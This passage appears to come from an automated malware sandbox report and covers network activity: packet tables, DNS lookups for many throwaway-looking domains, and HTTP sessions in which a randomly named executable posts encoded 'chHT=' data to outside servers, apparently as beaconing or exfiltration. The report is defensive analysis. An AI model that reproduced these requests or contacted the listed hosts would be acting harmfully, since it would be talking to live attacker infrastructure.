                      Sep 10, 2024 08:50:24.776459932 CEST8049769104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:24.780303955 CEST4976980192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:24.780303955 CEST4976980192.168.2.4104.21.20.125
                      Sep 10, 2024 08:50:24.785177946 CEST8049769104.21.20.125192.168.2.4
                      Sep 10, 2024 08:50:30.455188990 CEST4977080192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:30.460007906 CEST804977043.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:30.460890055 CEST4977080192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:30.473124027 CEST4977080192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:30.478884935 CEST804977043.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:31.342704058 CEST804977043.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:31.342767954 CEST804977043.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:31.342813015 CEST4977080192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:31.985866070 CEST4977080192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:33.004355907 CEST4977180192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:33.012254953 CEST804977143.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:33.012325048 CEST4977180192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:33.024079084 CEST4977180192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:33.029759884 CEST804977143.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:33.880614042 CEST804977143.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:33.880770922 CEST804977143.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:33.880814075 CEST4977180192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:34.534837961 CEST4977180192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:35.550503969 CEST4977280192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:35.555402994 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:35.555464029 CEST4977280192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:35.569287062 CEST4977280192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:35.574337006 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:35.574347019 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:35.574409008 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:35.574417114 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:35.574455023 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:35.574472904 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:35.574543953 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:35.574624062 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:35.574631929 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:36.650837898 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:36.651637077 CEST804977243.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:36.651770115 CEST4977280192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:37.078576088 CEST4977280192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:38.101648092 CEST4977380192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:38.106533051 CEST804977343.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:38.107466936 CEST4977380192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:38.113784075 CEST4977380192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:38.118880987 CEST804977343.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:38.979907036 CEST804977343.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:38.979924917 CEST804977343.242.202.169192.168.2.4
                      Sep 10, 2024 08:50:38.980036974 CEST4977380192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:38.982748032 CEST4977380192.168.2.443.242.202.169
                      Sep 10, 2024 08:50:38.987541914 CEST804977343.242.202.169192.168.2.4

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Sep 10, 2024 08:48:07.465018988 CEST5773853192.168.2.41.1.1.1
                      Sep 10, 2024 08:48:07.479814053 CEST53577381.1.1.1192.168.2.4
                      Sep 10, 2024 08:48:12.487456083 CEST6198153192.168.2.41.1.1.1
                      Sep 10, 2024 08:48:12.508961916 CEST53619811.1.1.1192.168.2.4
                      Sep 10, 2024 08:48:28.488284111 CEST6085053192.168.2.41.1.1.1
                      Sep 10, 2024 08:48:28.542239904 CEST53608501.1.1.1192.168.2.4
                      Sep 10, 2024 08:48:42.051938057 CEST6420953192.168.2.41.1.1.1
                      Sep 10, 2024 08:48:42.061791897 CEST53642091.1.1.1192.168.2.4
                      Sep 10, 2024 08:48:50.128107071 CEST4922953192.168.2.41.1.1.1
                      Sep 10, 2024 08:48:50.497734070 CEST53492291.1.1.1192.168.2.4
                      Sep 10, 2024 08:49:04.113327026 CEST5882053192.168.2.41.1.1.1
                      Sep 10, 2024 08:49:04.291960001 CEST53588201.1.1.1192.168.2.4
                      Sep 10, 2024 08:49:17.758831024 CEST6352153192.168.2.41.1.1.1
                      Sep 10, 2024 08:49:18.196357012 CEST53635211.1.1.1192.168.2.4
                      Sep 10, 2024 08:49:31.754637957 CEST6391253192.168.2.41.1.1.1
                      Sep 10, 2024 08:49:32.053291082 CEST53639121.1.1.1192.168.2.4
                      Sep 10, 2024 08:49:45.362951994 CEST5765553192.168.2.41.1.1.1
                      Sep 10, 2024 08:49:45.413435936 CEST53576551.1.1.1192.168.2.4
                      Sep 10, 2024 08:49:58.738811016 CEST5119253192.168.2.41.1.1.1
                      Sep 10, 2024 08:49:59.750818014 CEST5119253192.168.2.41.1.1.1
                      Sep 10, 2024 08:50:00.769584894 CEST5119253192.168.2.41.1.1.1
                      Sep 10, 2024 08:50:02.765942097 CEST5119253192.168.2.41.1.1.1
                      Sep 10, 2024 08:50:02.851320982 CEST53511921.1.1.1192.168.2.4
                      Sep 10, 2024 08:50:02.851332903 CEST53511921.1.1.1192.168.2.4
                      Sep 10, 2024 08:50:02.851341963 CEST53511921.1.1.1192.168.2.4
                      Sep 10, 2024 08:50:02.851358891 CEST53511921.1.1.1192.168.2.4
                      Sep 10, 2024 08:50:16.473834991 CEST6357453192.168.2.41.1.1.1
                      Sep 10, 2024 08:50:16.491364002 CEST53635741.1.1.1192.168.2.4
                      Sep 10, 2024 08:50:29.792268991 CEST4954753192.168.2.41.1.1.1
                      Sep 10, 2024 08:50:30.450336933 CEST53495471.1.1.1192.168.2.4
                      Sep 10, 2024 08:50:44.457495928 CEST5626953192.168.2.41.1.1.1
                      Sep 10, 2024 08:50:44.469816923 CEST53562691.1.1.1192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Sep 10, 2024 08:48:07.465018988 CEST192.168.2.41.1.1.10x27f8Standard query (0)www.monos.shopA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:48:12.487456083 CEST192.168.2.41.1.1.10x7769Standard query (0)www.726075.buzzA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:48:28.488284111 CEST192.168.2.41.1.1.10xa48dStandard query (0)www.freepicture.onlineA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:48:42.051938057 CEST192.168.2.41.1.1.10x1334Standard query (0)www.318st.comA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:48:50.128107071 CEST192.168.2.41.1.1.10x4c2dStandard query (0)www.hm62t.topA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:49:04.113327026 CEST192.168.2.41.1.1.10x20efStandard query (0)www.golbasi-nakliyat.xyzA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:49:17.758831024 CEST192.168.2.41.1.1.10x98c7Standard query (0)www.mfgamecompany.shopA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:49:31.754637957 CEST192.168.2.41.1.1.10x9ea4Standard query (0)www.quilo.lifeA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:49:45.362951994 CEST192.168.2.41.1.1.10xb606Standard query (0)www.qiluqiyuan.buzzA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:49:58.738811016 CEST192.168.2.41.1.1.10xc14dStandard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:49:59.750818014 CEST192.168.2.41.1.1.10xc14dStandard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:00.769584894 CEST192.168.2.41.1.1.10xc14dStandard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:02.765942097 CEST192.168.2.41.1.1.10xc14dStandard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:16.473834991 CEST192.168.2.41.1.1.10x32c5Standard query (0)www.kckartal.xyzA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:29.792268991 CEST192.168.2.41.1.1.10x6e5fStandard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:44.457495928 CEST192.168.2.41.1.1.10xc422Standard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Sep 10, 2024 08:48:07.479814053 CEST1.1.1.1192.168.2.40x27f8Name error (3)www.monos.shopnonenoneA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:48:12.508961916 CEST1.1.1.1192.168.2.40x7769No error (0)www.726075.buzz47.57.185.227A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:48:28.542239904 CEST1.1.1.1192.168.2.40xa48dNo error (0)www.freepicture.onlinefreepicture.onlineCNAME (Canonical name)IN (0x0001)false
                      Sep 10, 2024 08:48:28.542239904 CEST1.1.1.1192.168.2.40xa48dNo error (0)freepicture.online89.58.49.1A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:48:42.061791897 CEST1.1.1.1192.168.2.40x1334Name error (3)www.318st.comnonenoneA (IP address)IN (0x0001)false
                      Sep 10, 2024 08:48:50.497734070 CEST1.1.1.1192.168.2.40x4c2dNo error (0)www.hm62t.tophm62t.topCNAME (Canonical name)IN (0x0001)false
                      Sep 10, 2024 08:48:50.497734070 CEST1.1.1.1192.168.2.40x4c2dNo error (0)hm62t.top154.23.184.240A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:49:04.291960001 CEST1.1.1.1192.168.2.40x20efNo error (0)www.golbasi-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                      Sep 10, 2024 08:49:04.291960001 CEST1.1.1.1192.168.2.40x20efNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                      Sep 10, 2024 08:49:04.291960001 CEST1.1.1.1192.168.2.40x20efNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:49:18.196357012 CEST1.1.1.1192.168.2.40x98c7No error (0)www.mfgamecompany.shopmfgamecompany.shopCNAME (Canonical name)IN (0x0001)false
                      Sep 10, 2024 08:49:18.196357012 CEST1.1.1.1192.168.2.40x98c7No error (0)mfgamecompany.shop185.173.111.76A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:49:32.053291082 CEST1.1.1.1192.168.2.40x9ea4No error (0)www.quilo.life203.161.43.228A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:49:45.413435936 CEST1.1.1.1192.168.2.40xb606No error (0)www.qiluqiyuan.buzz161.97.168.245A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:02.851320982 CEST1.1.1.1192.168.2.40xc14dNo error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                      Sep 10, 2024 08:50:02.851320982 CEST1.1.1.1192.168.2.40xc14dNo error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:02.851332903 CEST1.1.1.1192.168.2.40xc14dNo error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                      Sep 10, 2024 08:50:02.851332903 CEST1.1.1.1192.168.2.40xc14dNo error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:02.851341963 CEST1.1.1.1192.168.2.40xc14dNo error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                      Sep 10, 2024 08:50:02.851341963 CEST1.1.1.1192.168.2.40xc14dNo error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:02.851358891 CEST1.1.1.1192.168.2.40xc14dNo error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                      Sep 10, 2024 08:50:02.851358891 CEST1.1.1.1192.168.2.40xc14dNo error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:16.491364002 CEST1.1.1.1192.168.2.40x32c5No error (0)www.kckartal.xyz104.21.20.125A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:16.491364002 CEST1.1.1.1192.168.2.40x32c5No error (0)www.kckartal.xyz172.67.192.227A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:30.450336933 CEST1.1.1.1192.168.2.40x6e5fNo error (0)www.mizuquan.top43.242.202.169A (IP address)IN (0x0001)false
                      Sep 10, 2024 08:50:44.469816923 CEST1.1.1.1192.168.2.40xc422Name error (3)www.kxshopmr.storenonenoneA (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • www.726075.buzz
                      • www.freepicture.online
                      • www.hm62t.top
                      • www.golbasi-nakliyat.xyz
                      • www.mfgamecompany.shop
                      • www.quilo.life
                      • www.qiluqiyuan.buzz
                      • www.bola88site.one
                      • www.kckartal.xyz
                      • www.mizuquan.top

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.44973647.57.185.227801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:48:12.525230885 CEST458OUTGET /w9nd/?chHT=9dRK0h7YIJsGSRnhz7V9NsNj7P/k9yHBPHBwJCn+XP7nQ6BgyCo2QTTghBp7CnsQKe5GALi32E4BE+loUVZtqUckbqGSyTGH7gwVeueowUmtWPR1ijKwEtw=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.726075.buzz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:48:13.436589003 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:13 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "6663edd0-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.44973789.58.49.1801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:48:28.559892893 CEST740OUTPOST /xcfw/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.freepicture.online
                      Origin: http://www.freepicture.online
                      Referer: http://www.freepicture.online/xcfw/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2f 41 4b 70 77 30 4d 37 4f 6c 64 39 75 71 6d 31 79 5a 56 70 4d 72 46 4a 79 57 45 2f 33 56 38 2f 48 55 66 4d 32 48 49 44 34 59 63 63 73 61 6d 77 58 72 2b 64 47 58 4c 41 49 58 57 79 4b 44 35 39 74 68 51 36 43 47 78 75 71 79 2f 44 46 64 35 54 66 74 4b 42 6d 69 50 54 46 43 31 68 33 61 39 46 69 43 67 34 58 57 55 57 31 41 77 4a 38 68 48 56 54 31 4b 36 31 49 59 37 58 61 78 34 69 2b 6d 44 49 78 30 58 4a 57 52 6b 58 72 58 72 6e 6f 77 2b 5a 45 53 6c 71 70 71 4d 71 51 49 6b 31 47 71 58 76 74 64 58 32 77 38 75 36 4b 69 61 63 32 2b 35 48 76 58 65 6f 51 3d 3d
                      Data Ascii: chHT=Wh+VGNuLBIYa/AKpw0M7Old9uqm1yZVpMrFJyWE/3V8/HUfM2HID4YccsamwXr+dGXLAIXWyKD59thQ6CGxuqy/DFd5TftKBmiPTFC1h3a9FiCg4XWUW1AwJ8hHVT1K61IY7Xax4i+mDIx0XJWRkXrXrnow+ZESlqpqMqQIk1GqXvtdX2w8u6Kiac2+5HvXeoQ==
                      Sep 10, 2024 08:48:29.177470922 CEST360INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:48:29 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.44973889.58.49.1801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:48:31.301776886 CEST760OUTPOST /xcfw/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.freepicture.online
                      Origin: http://www.freepicture.online
                      Referer: http://www.freepicture.online/xcfw/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 59 2f 48 32 58 4d 33 43 6b 44 31 34 63 63 34 4b 6d 31 5a 4c 2b 44 47 58 48 69 49 53 32 79 4b 44 39 39 74 67 67 36 43 33 78 70 6f 69 2f 46 44 64 35 52 52 4e 4b 42 6d 69 50 54 46 43 68 48 33 61 6c 46 69 78 34 34 58 33 55 52 32 41 77 4b 37 68 48 56 5a 56 4c 53 31 49 5a 75 58 66 56 65 69 38 65 44 49 78 6b 58 4a 69 39 6e 65 72 58 70 74 49 78 37 55 6e 76 4b 6a 61 66 64 6e 43 45 36 2b 48 32 4f 6e 4c 4d 4e 6e 42 64 35 6f 4b 47 70 42 78 33 4e 4b 73 71 58 7a 64 4b 36 37 6a 65 4f 79 51 52 6c 53 53 68 36 5a 61 6e 56 4c 67 30 3d
                      Data Ascii: chHT=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GY/H2XM3CkD14cc4Km1ZL+DGXHiIS2yKD99tgg6C3xpoi/FDd5RRNKBmiPTFChH3alFix44X3UR2AwK7hHVZVLS1IZuXfVei8eDIxkXJi9nerXptIx7UnvKjafdnCE6+H2OnLMNnBd5oKGpBx3NKsqXzdK67jeOyQRlSSh6ZanVLg0=
                      Sep 10, 2024 08:48:31.928316116 CEST360INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:48:31 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.44974089.58.49.1801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:48:33.844938040 CEST10842OUTPOST /xcfw/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.freepicture.online
                      Origin: http://www.freepicture.online
                      Referer: http://www.freepicture.online/xcfw/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 57 68 2b 56 47 4e 75 4c 42 49 59 61 2b 6a 53 70 39 30 77 37 5a 31 64 36 72 71 6d 31 34 35 56 6c 4d 72 42 4a 79 53 64 30 33 47 51 2f 48 6a 62 4d 32 6c 51 44 30 34 63 63 37 4b 6d 30 5a 4c 2f 47 47 58 76 6d 49 53 71 49 4b 42 31 39 74 43 6f 36 56 79 52 70 69 69 2f 46 42 64 35 4d 66 74 4c 62 6d 69 66 4d 46 43 78 48 33 61 6c 46 69 33 55 34 65 47 55 52 77 41 77 4a 38 68 48 5a 54 31 4b 2f 31 49 51 56 58 65 55 6c 6a 4e 2b 44 49 56 34 58 61 6e 52 6e 52 72 58 6e 71 49 78 64 55 6e 6a 56 6a 61 44 52 6e 44 77 63 2b 48 53 4f 6b 39 35 50 79 6a 4a 42 37 72 36 6e 61 77 57 33 44 66 47 53 7a 38 48 47 39 42 79 68 6b 79 74 30 63 78 41 47 65 71 6a 71 65 33 45 72 6f 6a 56 63 43 67 50 78 65 4c 57 34 34 49 57 49 2b 35 73 34 53 6b 6c 63 67 43 33 65 50 4c 38 54 77 79 4c 39 7a 56 6b 79 78 50 54 51 66 4c 63 73 5a 42 4f 68 70 5a 7a 55 4f 59 54 69 54 4c 4e 46 45 67 34 6a 63 6b 69 70 45 34 41 46 2f 4d 6a 51 58 6c 47 69 59 31 68 2b 62 71 32 4a 59 4c 6d 37 30 39 76 46 5a 55 4e 66 45 4f 32 64 51 75 39 67 79 75 75 43 41 [TRUNCATED]
                      Data Ascii: chHT=Wh+VGNuLBIYa+jSp90w7Z1d6rqm145VlMrBJySd03GQ/HjbM2lQD04cc7Km0ZL/GGXvmISqIKB19tCo6VyRpii/FBd5MftLbmifMFCxH3alFi3U4eGURwAwJ8hHZT1K/1IQVXeUljN+DIV4XanRnRrXnqIxdUnjVjaDRnDwc+HSOk95PyjJB7r6nawW3DfGSz8HG9Byhkyt0cxAGeqjqe3ErojVcCgPxeLW44IWI+5s4SklcgC3ePL8TwyL9zVkyxPTQfLcsZBOhpZzUOYTiTLNFEg4jckipE4AF/MjQXlGiY1h+bq2JYLm709vFZUNfEO2dQu9gyuuCA24a1o8Xb2a/WXuDimxz8vu43QRNbuEWgP2HZjyD8XFlJ0bVYzW7wCQp4Luhwp0Fp6YPhxc2EDHQHcLP6w5U6gzUCKPyD0KLmtVcJtNYbkh+IqJWtyPXhyngWYSDpOXl0fFbhlBLcu6bm9itO3gM7BVioCEfzusABFVS3cJNH1GcLi8VQp5/Uf5w2P89wpfcWaJOhxPfpDudh2uDTAXIVUHHDmuznYoVg248NCgPfCSwIyh9F2HZDt5a7fJs1sTtBpRppp+9yV2oSp7pxZ43e2l5hfXNhDHR09j3JKNd9t/C5JISpTzX46FiFgasd713GMOMZola6DfR1dllNJydH7IM/Sh4QKgrS/3LmFTWhaJWgfvwQG4/hU8t5qIyjXOtElAIP6leBQtqv8+MPhbvZfk8kmlRuNGQsFERjo4n/6M2ELdIxqV+YjD0lUyiPsJ4nWIvdu3KK2u1UuIfqMcOHxTC39qSMqdpxWqdKLR+3kTLJbO2r+45chwcXrAf5x9EgN1FD15W1790umleVi/hmuGHpK0HRAqesDgxb+wQGaMWc1PrqzzsbwSpYobY1wI4K+D/BcMU0KEJYJXeVSffsD9DMfxLKvkq9Ad4hjoZAQEfeOvEBPzQGSoe9IhFGyg+Cf06RAUK6zaQ1YHaGhrKVmJWbcr+HNyWdtN [TRUNCATED]
                      Sep 10, 2024 08:48:34.566261053 CEST360INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:48:34 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.44974189.58.49.1801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
